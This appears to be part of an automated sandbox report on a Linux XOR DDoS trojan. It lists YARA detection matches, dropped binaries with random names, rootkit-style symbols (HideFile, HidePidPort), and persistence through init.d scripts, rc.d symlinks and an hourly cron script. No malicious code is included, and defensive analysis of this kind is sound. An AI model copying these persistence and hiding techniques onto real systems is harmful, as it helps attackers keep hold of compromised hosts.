              Source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/zetazkptwu, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/tudlcvpgbc, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/tudlcvpgbc, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/qjfxtxsijs, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/qjfxtxsijs, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /lib/libudev.so, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /lib/libudev.so, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/kmavqzvhro, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/kmavqzvhro, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/zyapsjpaje, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/zyapsjpaje, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/txflbjqefg, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/txflbjqefg, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/whtzopaggc, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/whtzopaggc, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/wrfeamwlub, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/wrfeamwlub, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/wyyhrifhaz, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/wyyhrifhaz, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/wgpgdetjwe, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/wgpgdetjwe, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/yfiimchuiz, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/yfiimchuiz, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/qvilroogsz, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/qvilroogsz, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: dkuidbsedpELF static info symbol of initial sample: HideFile
              Source: dkuidbsedpELF static info symbol of initial sample: HidePidPort
              Source: dkuidbsedpELF static info symbol of initial sample: __after_morecore_hook
              Source: dkuidbsedpELF static info symbol of initial sample: __free_hook
              Source: dkuidbsedpELF static info symbol of initial sample: __libc_register_dl_open_hook
              Source: dkuidbsedpELF static info symbol of initial sample: __libc_register_dlfcn_hook
              Source: dkuidbsedpELF static info symbol of initial sample: __malloc_hook
              Source: dkuidbsedpELF static info symbol of initial sample: __malloc_initialize_hook
              Source: dkuidbsedpELF static info symbol of initial sample: __memalign_hook
              Source: libudev.so.7.drELF static info symbol of dropped file: HideFile
              Source: libudev.so.7.drELF static info symbol of dropped file: HidePidPort
              Source: libudev.so.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: libudev.so.7.drELF static info symbol of dropped file: __free_hook
              Source: libudev.so.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: libudev.so.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: libudev.so.7.drELF static info symbol of dropped file: __malloc_hook
              Source: libudev.so.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: libudev.so.7.drELF static info symbol of dropped file: __memalign_hook
              Source: qvilroogsz.7.drELF static info symbol of dropped file: HideFile
              Source: qvilroogsz.7.drELF static info symbol of dropped file: HidePidPort
              Source: qvilroogsz.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: qvilroogsz.7.drELF static info symbol of dropped file: __free_hook
              Source: qvilroogsz.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: qvilroogsz.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: qvilroogsz.7.drELF static info symbol of dropped file: __malloc_hook
              Source: qvilroogsz.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: qvilroogsz.7.drELF static info symbol of dropped file: __memalign_hook
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: HideFile
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: HidePidPort
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: __free_hook
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: __malloc_hook
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: wyyhrifhaz.7.drELF static info symbol of dropped file: __memalign_hook
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: HideFile
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: HidePidPort
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: __free_hook
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: __malloc_hook
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: wrfeamwlub.7.drELF static info symbol of dropped file: __memalign_hook
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: HideFile
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: HidePidPort
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: __free_hook
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: __malloc_hook
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: wgpgdetjwe.7.drELF static info symbol of dropped file: __memalign_hook
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: HideFile
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: HidePidPort
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: __free_hook
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: __malloc_hook
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: zyapsjpaje.7.drELF static info symbol of dropped file: __memalign_hook
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: HideFile
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: HidePidPort
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: __free_hook
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: __malloc_hook
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: yfiimchuiz.7.drELF static info symbol of dropped file: __memalign_hook
              Source: txflbjqefg.7.drELF static info symbol of dropped file: HideFile
              Source: txflbjqefg.7.drELF static info symbol of dropped file: HidePidPort
              Source: txflbjqefg.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: txflbjqefg.7.drELF static info symbol of dropped file: __free_hook
              Source: txflbjqefg.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: txflbjqefg.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: txflbjqefg.7.drELF static info symbol of dropped file: __malloc_hook
              Source: txflbjqefg.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: txflbjqefg.7.drELF static info symbol of dropped file: __memalign_hook
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: HideFile
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: HidePidPort
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: __free_hook
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: __malloc_hook
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: qjfxtxsijs.7.drELF static info symbol of dropped file: __memalign_hook
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: HideFile
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: HidePidPort
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: __free_hook
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: __malloc_hook
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: tudlcvpgbc.7.drELF static info symbol of dropped file: __memalign_hook
              Source: whtzopaggc.7.drELF static info symbol of dropped file: HideFile
              Source: whtzopaggc.7.drELF static info symbol of dropped file: HidePidPort
              Source: whtzopaggc.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: whtzopaggc.7.drELF static info symbol of dropped file: __free_hook
              Source: whtzopaggc.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: whtzopaggc.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: whtzopaggc.7.drELF static info symbol of dropped file: __malloc_hook
              Source: whtzopaggc.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: whtzopaggc.7.drELF static info symbol of dropped file: __memalign_hook
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: HideFile
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: HidePidPort
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: __after_morecore_hook
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: __free_hook
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: __malloc_hook
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: kmavqzvhro.7.drELF static info symbol of dropped file: __memalign_hook
              Source: classification engineClassification label: mal100.troj.evad.lin@0/20@5/0
              Source: /tmp/dkuidbsedp (PID: 9446)/run/gcc.pid: vcgktyioiaixliwssuhhjmnsuaneafuyJump to behavior

              Persistence and Installation Behavior

              barindex
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc1.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc2.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc3.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc4.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc5.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc.d/rc1.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc.d/rc2.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc.d/rc3.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc.d/rc4.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/rc.d/rc5.d/S90dkuidbsedp -> /etc/init.d/dkuidbsedpJump to behavior
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/rc1.d/S01dkuidbsedp -> ../init.d/dkuidbsedpJump to behavior
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/rc2.d/S01dkuidbsedp -> ../init.d/dkuidbsedpJump to behavior
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/rc3.d/S01dkuidbsedp -> ../init.d/dkuidbsedpJump to behavior
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/rc4.d/S01dkuidbsedp -> ../init.d/dkuidbsedpJump to behavior
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/rc5.d/S01dkuidbsedp -> ../init.d/dkuidbsedpJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/cron.hourly/gcc.shJump to behavior
              Source: /bin/dash (PID: 9469)File: /etc/crontabJump to behavior
              Source: /bin/sed (PID: 9472)File: /etc/crontabJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /lib/libudev.soJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/qvilroogszJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/wyyhrifhazJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/wrfeamwlubJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/wgpgdetjweJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/zyapsjpajeJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/yfiimchuizJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/txflbjqefgJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/qjfxtxsijsJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/tudlcvpgbcJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/whtzopaggcJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/kmavqzvhroJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File written: /usr/bin/zetazkptwuJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)Reads from proc file: /proc/statJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)Reads from proc file: /proc/meminfoJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)Reads from proc file: /proc/cpuinfoJump to behavior
              Source: /usr/sbin/update-rc.d (PID: 9537)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)Writes shell script file to disk with an unusual file extension: /etc/init.d/dkuidbsedpJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: /tmp/dkuidbsedp (PID: 9446)File: /etc/init.d/dkuidbsedpJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qvilroogszJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wyyhrifhazJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wrfeamwlubJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wgpgdetjweJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/zyapsjpajeJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/yfiimchuizJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/txflbjqefgJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qjfxtxsijsJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/tudlcvpgbcJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/whtzopaggcJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/kmavqzvhroJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/zetazkptwuJump to dropped file
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/init.d/.depend.bootJump to dropped file
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/init.d/.depend.startJump to dropped file
              Source: /usr/lib/insserv/insserv (PID: 9493)File: /etc/init.d/.depend.stopJump to dropped file
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qvilroogszJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wyyhrifhazJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wrfeamwlubJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wgpgdetjweJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/zyapsjpajeJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/yfiimchuizJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/txflbjqefgJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qjfxtxsijsJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/tudlcvpgbcJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/whtzopaggcJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/kmavqzvhroJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/zetazkptwuJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/jvzzirmjsaJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/gkckltchocJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/rlxosagpctJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/pnljtnsppbJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/lhyaaotaphJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/otigswehlvJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/thzrysleblJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/sunvkgnszwJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/yclsxhkbliJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/nvlkgshfzsJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wgerzwaeqgJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/chvtxqzhiwJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qwevskbjgsJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/kztofeuxtkJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/tihvbqlbyhJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/evsgasjgjuJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/jyfcwmvcimJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/nwaorjveczJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/cqsoclzfrtJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/udrzmjfbgfJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qwgryggbpqJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/thqvayvyihJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/fcpzadqmptJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/ibtfyvoofmJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/tlayyibciaJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/dzlsbdiinrJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qwdfhkhfeqJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/ldaqsdrmbuJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/wuipuaslsyJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/uvaewfcsxaJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/bbynnggifoJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/lcbdpulcrsJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/vrbpjcuukkJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/potliirubiJump to behavior
              Source: /tmp/dkuidbsedp (PID: 9446)File: /usr/bin/qvavyybczkJump to behavior
              Source: /usr/bin/qvilroogsz (PID: 9548)File: /usr/bin/qvilroogszJump to behavior
              Source: /usr/bin/qvilroogsz (PID: 9559)File: /usr/bin/qvilroogszJump to behavior
              Source: /usr/bin/qvilroogsz (PID: 9570)File: /usr/bin/qvilroogszJump to behavior
              Source: /usr/bin/qvilroogsz (PID: 9581)File: /usr/bin/qvilroogszJump to behavior
              Source: /usr/bin/qvilroogsz (PID: 9592)File: /usr/bin/qvilroogszJump to behavior
              Source: /usr/bin/wyyhrifhaz (PID: 9603)File: /usr/bin/wyyhrifhazJump to behavior
              Source: /usr/bin/wyyhrifhaz (PID: 9614)File: /usr/bin/wyyhrifhazJump to behavior
              Source: /usr/bin/wyyhrifhaz (PID: 9626)File: /usr/bin/wyyhrifhazJump to behavior
              Source: /usr/bin/wyyhrifhaz (PID: 9636)File: /usr/bin/wyyhrifhazJump to behavior
              Source: /usr/bin/wyyhrifhaz (PID: 9647)File: /usr/bin/wyyhrifhazJump to behavior
              Source: /usr/bin/wrfeamwlub (PID: 9658)File: /usr/bin/wrfeamwlubJump to behavior
              Source: /usr/bin/wrfeamwlub (PID: 9669)File: /usr/bin/wrfeamwlubJump to behavior
              Source: /usr/bin/wrfeamwlub (PID: 9680)File: /usr/bin/wrfeamwlubJump to behavior
              Source: /usr/bin/wrfeamwlub (PID: 9691)File: /usr/bin/wrfeamwlubJump to behavior
              Source: /usr/bin/wrfeamwlub (PID: 9702)File: /usr/bin/wrfeamwlubJump to behavior
              Source: /usr/bin/wgpgdetjwe (PID: 9713)File: /usr/bin/wgpgdetjweJump to behavior
              Source: /usr/bin/wgpgdetjwe (PID: 9724)File: /usr/bin/wgpgdetjweJump to behavior
              Source: /usr/bin/wgpgdetjwe (PID: 9735)File: /usr/bin/wgpgdetjweJump to behavior
              Source: /usr/bin/wgpgdetjwe (PID: 9746)File: /usr/bin/wgpgdetjweJump to behavior
              Source: /usr/bin/wgpgdetjwe (PID: 9758)File: /usr/bin/wgpgdetjweJump to behavior
              Source: /usr/bin/zyapsjpaje (PID: 9768)File: /usr/bin/zyapsjpajeJump to behavior
              Source: /usr/bin/zyapsjpaje (PID: 9779)File: /usr/bin/zyapsjpajeJump to behavior
              Source: /usr/bin/zyapsjpaje (PID: 9790)File: /usr/bin/zyapsjpajeJump to behavior
              Source: /usr/bin/zyapsjpaje (PID: 9801)File: /usr/bin/zyapsjpajeJump to behavior
              Source: /usr/bin/zyapsjpaje (PID: 9812)File: /usr/bin/zyapsjpajeJump to behavior
              Source: /usr/bin/yfiimchuiz (PID: 9823)File: /usr/bin/yfiimchuizJump to behavior
              Source: /usr/bin/yfiimchuiz (PID: 9835)File: /usr/bin/yfiimchuizJump to behavior
